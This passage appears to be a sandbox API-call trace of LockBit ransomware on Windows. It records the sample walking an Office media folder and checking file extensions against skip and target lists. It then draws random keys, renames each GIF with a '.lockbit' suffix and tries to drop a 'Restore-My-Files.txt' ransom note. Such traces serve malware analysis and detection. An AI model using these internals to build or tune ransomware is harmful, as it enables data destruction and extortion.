pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.982] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.982] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.982] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246baa00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdc8c40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x246baa00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x1f91, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21332_.GIF", cAlternateFileName="")) returned 1 [0209.982] lstrcmpiW (lpString1=".", lpString2="BD21332_.GIF") returned -1 [0209.982] lstrcmpiW (lpString1="..", lpString2="BD21332_.GIF") returned -1 [0209.982] PathFindExtensionW (pszPath="BD21332_.GIF") returned=".GIF" [0209.982] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.982] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.982] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.982] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.982] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.982] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.982] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.983] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.983] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.983] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.983] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.983] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.983] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.983] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.983] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.983] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.984] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21332_.GIF") returned 1 [0209.984] lstrcmpiW (lpString1="ntldr", lpString2="BD21332_.GIF") returned 1 [0209.984] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21332_.GIF") returned 1 [0209.984] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21332_.GIF") returned 1 [0209.984] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21332_.GIF") returned -1 [0209.984] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21332_.GIF") returned 1 [0209.984] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21332_.GIF") returned 1 [0209.984] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.984] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21332_.GIF") returned=".GIF" [0209.984] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.984] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.984] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.984] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.985] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.985] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.985] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21332_.GIF.lockbit") returned 76 [0209.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21332_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21332_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x238 [0209.987] CreateIoCompletionPort (FileHandle=0x238, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.987] malloc (_Size=0x40068) returned 0x3df0008 [0209.987] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8081) returned 1 [0209.987] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.988] ReadFile (in: hFile=0x238, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.990] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21332_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21332_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.990] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.990] NtSetInformationFile (FileHandle=0x238, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.992] free (_Block=0x1fa2ed8) [0209.992] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21332_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.992] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.992] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.992] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e75c900, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdeeda0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1e75c900, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x888, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21334_.GIF", cAlternateFileName="")) returned 1 [0209.992] lstrcmpiW (lpString1=".", lpString2="BD21334_.GIF") returned -1 [0209.992] lstrcmpiW (lpString1="..", lpString2="BD21334_.GIF") returned -1 [0209.992] PathFindExtensionW (pszPath="BD21334_.GIF") returned=".GIF" [0209.992] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.992] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.992] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.992] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.992] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.992] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.992] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.992] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.992] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.992] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.992] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.992] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.992] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.992] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.992] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.992] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.993] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.993] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.993] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.993] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.993] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.993] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.993] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.994] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.994] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.994] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.994] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.994] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21334_.GIF") returned 1 [0209.994] lstrcmpiW (lpString1="ntldr", lpString2="BD21334_.GIF") returned 1 [0209.994] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21334_.GIF") returned 1 [0209.994] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21334_.GIF") returned 1 [0209.994] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21334_.GIF") returned -1 [0209.994] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21334_.GIF") returned 1 [0209.994] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21334_.GIF") returned 1 [0209.994] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.994] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21334_.GIF") returned=".GIF" [0209.994] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.994] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.994] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.994] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.995] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.995] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.995] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.995] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.995] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21334_.GIF.lockbit") returned 76 [0209.995] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21334_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21334_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0209.997] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.997] malloc (_Size=0x40068) returned 0x1ff1e60 [0209.997] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2184) returned 1 [0209.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.998] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0209.998] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.998] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0209.998] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.002] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21334_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21334_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.002] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.002] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.004] free (_Block=0x1fa2ed8) [0210.004] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21334_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.004] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.004] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4465be00, ftCreationTime.dwHighDateTime=0x1bd4f48, ftLastAccessTime.dwLowDateTime=0xbcdeeda0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4465be00, ftLastWriteTime.dwHighDateTime=0x1bd4f48, nFileSizeHigh=0x0, nFileSizeLow=0xaeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21336_.GIF", cAlternateFileName="")) returned 1 [0210.004] lstrcmpiW (lpString1=".", lpString2="BD21336_.GIF") returned -1 [0210.004] lstrcmpiW (lpString1="..", lpString2="BD21336_.GIF") returned -1 [0210.004] PathFindExtensionW (pszPath="BD21336_.GIF") returned=".GIF" [0210.004] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.004] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.005] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.005] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.006] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.006] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.006] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.006] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21336_.GIF") returned 1 [0210.007] lstrcmpiW (lpString1="ntldr", lpString2="BD21336_.GIF") returned 1 [0210.007] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21336_.GIF") returned 1 [0210.007] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21336_.GIF") returned 1 [0210.007] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21336_.GIF") returned -1 [0210.007] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21336_.GIF") returned 1 [0210.007] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21336_.GIF") returned 1 [0210.007] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.007] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21336_.GIF") returned=".GIF" [0210.007] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.007] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.007] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.007] 